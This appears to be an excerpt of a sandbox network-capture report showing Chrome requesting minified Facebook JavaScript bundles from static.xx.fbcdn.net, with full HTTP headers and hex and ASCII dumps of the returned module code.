                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 63 73 78 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 73 78 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 73 65 6c 65 63 74 6f 72 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 67 65 74 4f 72 43 72 65 61 74 65 44 4f 4d 49 44 22 2c 5b 22 75 6e 69 71 75 65 49 44 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 2e 69 64 7c 7c 28 61 2e 69 64 3d 63 28 22 75 6e 69 71 75 65 49 44 22
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID"
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC803INData Raw: 67 22 26 26 28 61 3d 63 28 22 24 22 29 28 61 29 29 3b 72 65 74 75 72 6e 20 63 28 22 53 74 79 6c 65 43 6f 72 65 22 29 2e 67 65 74 46 6c 6f 61 74 28 61 2c 62 29 7d 7d 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 73 73 56 61 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 63 73 73 56 61 72 28 22 27 2b 61 2b 27 22 29 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 27 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 73 65 74 49 6d 6d 65 64 69 61 74 65 22 2c 5b 22 54 69 6d 65 53 6c 69
                                                                                                                                                                                                                                  Data Ascii: g"&&(a=c("$")(a));return c("StyleCore").getFloat(a,b)}});b=a;g["default"]=b}),98);__d("cssVar",[],(function(a,b,c,d,e,f){function a(a){throw new Error('cssVar("'+a+'"): Unexpected class transformation.')}f["default"]=a}),66);__d("setImmediate",["TimeSli


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  44192.168.2.649769157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: SSGtfbAxBhRkHRMbiDwz5Q==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 18:36:39 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 3wzH705W1PMpnv1HovhTOTAhWpHk9v0oapXUD6O5hAXT+mVfMnHDiMV2p45JxpNNFWfUb+A7wySoSb6GHu0Alg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 24223
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 66 6f 72 45 61 63 68 4f 62 6a 65 63 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 64 3b 67 2e 63 61 6c 6c 28 61 2c 65 29 26 26 62 2e 63 61 6c 6c 28 63 2c 61 5b 65 5d 2c 65 2c 61 29 7d 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 73 69 63 56 65 63 74 6f 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);__d("BasicVector",[],(function(a,b,c,d,e,f)
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC8350INData Raw: 63 2c 73 74 61 72 74 54 69 6d 65 3a 65 2c 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 3a 67 2c 73 6f 72 74 49 6e 64 65 78 3a 2d 31 7d 3b 65 3e 66 3f 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 65 2c 6c 28 74 2c 63 29 2c 6e 75 6c 6c 3d 3d 3d 6d 28 73 29 26 26 63 3d 3d 3d 6d 28 74 29 26 26 28 7a 3f 28 42 28 47 29 2c 47 3d 2d 31 29 3a 7a 3d 21 30 2c 4f 28 45 2c 65 2d 66 29 29 29 3a 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 67 2c 6c 28 73 2c 63 29 2c 79 7c 7c 78 7c 7c 28 79 3d 21 30 2c 4e 28 29 29 29 3b 72 65 74 75 72 6e 20 63 7d 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 73 68 6f 75 6c 64 59 69 65 6c 64 3d 4a 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 77 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                  Data Ascii: c,startTime:e,expirationTime:g,sortIndex:-1};e>f?(c.sortIndex=e,l(t,c),null===m(s)&&c===m(t)&&(z?(B(G),G=-1):z=!0,O(E,e-f))):(c.sortIndex=g,l(s,c),y||x||(y=!0,N()));return c};h.unstable_shouldYield=J;h.unstable_wrapCallback=function(c){var d=w;return func


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  45192.168.2.649772157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ZXUSaTUvXH/z41yDoCXizg==
                                                                                                                                                                                                                                  Expires: Mon, 29 Sep 2025 04:53:19 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: c00GeYQVzP3j7soP9wajkfj9iVOXdIAUOwNLMGZcJeQ8lHI2CtsbW/r0l76ZbM43BaBev3EHkoNgjZxtWbs7Bg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=114, ullat=0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 4295
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1500INData Raw: 3b 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 58 44 4f 4d 53 63 61 6e 6e 65 72 52 65 73 75 6c 74 73 43 6f 6e 74 72 6f 6c 6c 65 72 52 6f 75 74 65 42 75 69 6c 64 65 72 22 2c 5b 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 61 3d 63 28 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 29 28 22 2f 73 68 61 72 65 64 2f 75 73 65 72 5f 70 72 65 66 65 72 65 6e 63 65 73 2f 22 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 2c 76 6f 69 64 20 30 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 44 4f 4d 53 63 61 6e 6e 65 72 22 2c 5b 22 42 61 73 65 36 34 22 2c 22 43 6f 6e 73 74 55 72 69 55 74 69 6c 73 22 2c
                                                                                                                                                                                                                                  Data Ascii: ;/*FB_PKG_DELIM*/__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);__d("DOMScanner",["Base64","ConstUriUtils",
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1500INData Raw: 68 2e 62 6f 74 74 6f 6d 2c 6c 3a 68 2e 6c 65 66 74 2c 72 3a 68 2e 72 69 67 68 74 2c 74 3a 68 2e 74 6f 70 7d 2c 73 69 7a 65 3a 7b 68 3a 64 2e 68 65 69 67 68 74 2c 77 3a 64 2e 77 69 64 74 68 7d 2c 73 72 63 3a 64 2e 73 72 63 2c 76 69 73 69 62 69 6c 69 74 79 3a 64 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 7d 2c 6e 75 6c 6c 2c 32 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 26 26 28 66 3d 64 2e 63 6c 61 73 73 4e 61 6d 65 29 3b 64 2e 69 64 26 26 28 67 3d 64 2e 69 64 29 3b 64 3d 5b 22 69 66 72 61 6d 65 22 2c 65 2c 67 2c 66 2c 68 5d 3b 61 2e 70 75 73 68 28 64 29 7d 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 61 3d 5b 5d 2c 62 3d 28 6a 7c 7c 28 6a 3d 63 28 22 57 65 62 53 74 6f 72 61 67 65 22 29 29 29 2e 67 65 74 4c 6f 63 61
                                                                                                                                                                                                                                  Data Ascii: h.bottom,l:h.left,r:h.right,t:h.top},size:{h:d.height,w:d.width},src:d.src,visibility:d.style.visibility},null,2);d.className&&(f=d.className);d.id&&(g=d.id);d=["iframe",e,g,f,h];a.push(d)}}return a}function u(){var a=[],b=(j||(j=c("WebStorage"))).getLoca
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1295INData Raw: 29 7b 63 28 22 46 42 4c 6f 67 67 65 72 22 29 28 22 64 6f 6d 73 63 61 6e 6e 65 72 22 29 2e 63 61 74 63 68 69 6e 67 28 61 29 2e 6d 75 73 74 66 69 78 28 22 43 68 65 63 6b 20 6c 69 6e 6b 20 74 61 67 73 20 66 61 69 6c 65 64 22 29 7d 61 28 29 7d 29 7d 29 2c 6e 3d 6e 65 77 20 69 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 68 7c 7c 28 68 3d 64 28 22 4a 53 53 63 68 65 64 75 6c 65 72 22 29 29 29 2e 73 63 68 65 64 75 6c 65 4c 6f 67 67 69 6e 67 50 72 69 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 66 3d 66 2e 63 6f 6e 63 61 74 28 72 28 29 29 7d 63 61 74 63 68 28 61 29 7b 63 28 22 46 42 4c 6f 67 67 65 72 22 29 28 22 64 6f 6d 73 63 61 6e 6e 65 72 22 29 2e 63 61 74 63 68 69 6e 67 28 61 29 2e 6d 75 73 74 66 69 78 28 22 43 68 65 63 6b 20 73 68 61
                                                                                                                                                                                                                                  Data Ascii: ){c("FBLogger")("domscanner").catching(a).mustfix("Check link tags failed")}a()})}),n=new i(function(a){(h||(h=d("JSScheduler"))).scheduleLoggingPriCallback(function(){try{f=f.concat(r())}catch(a){c("FBLogger")("domscanner").catching(a).mustfix("Check sha


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  46192.168.2.649773157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ubkaRKiel1rYqBTqhjr0kQ==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 18:36:39 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 28csFJ4zP5Xsi1nycl4YyszgyfIToOJNnsSrkrZKrShSqnGdmlzcPPVy8XZoCT8ZbWLGT++OHNbzrdoTpKA7hw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 28815
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 41 64 61 70 74 65 72 22 2c 5b 22 63 72 3a 35 38 36 36 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 35 38 36 36 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 43 6f 6e 73 74 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 53 45 4e 44 3a 22 42 61 6e 7a 61 69 3a 53 45 4e 44 22 2c 4f 4b 3a 22 42 61 6e 7a 61 69 3a 4f 4b 22 2c 45 52 52 4f 52 3a 22 42 61 6e 7a 61 69 3a 45 52 52 4f 52 22 2c 53 48 55 54 44 4f 57 4e 3a 22 42 61 6e 7a 61 69 3a 53 48 55 54 44 4f 57 4e 22 2c 42 41 53 49 43 3a 22 62 61 73 69 63 22 2c 56 49 54
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VIT
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC12942INData Raw: 65 3d 73 28 61 2c 6a 2c 68 2d 6a 2c 64 2c 65 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 63 29 7b 64 6f 20 62 5b 63 5d 3d 61 26 31 32 37 2c 61 3d 61 3e 3e 3e 37 2c 61 3e 30 26 26 28 62 5b 63 5d 2b 3d 31 32 38 29 2c 63 2b 3d 31 3b 77 68 69 6c 65 28 61 3e 30 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 74 68 69 73 2e 61 72 72 61 79 3d 61 7d 78 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 78 43 6f 6d 70 72 65 73 73 65 64 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 20 33 32 2b 61 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 2f 36 29 7d 3b 78 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 72 65 73 73 54 6f 42
                                                                                                                                                                                                                                  Data Ascii: e=s(a,j,h-j,d,e));return e}function w(a,b,c){do b[c]=a&127,a=a>>>7,a>0&&(b[c]+=128),c+=1;while(a>0);return c}function x(a){this.array=a}x.prototype.maxCompressedLength=function(){var a=this.array.length;return 32+a+Math.floor(a/6)};x.prototype.compressToB


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  47192.168.2.649774157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC385OUTGET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: mSPkTjocO3asr/CIDMBqtw==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 22:07:57 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
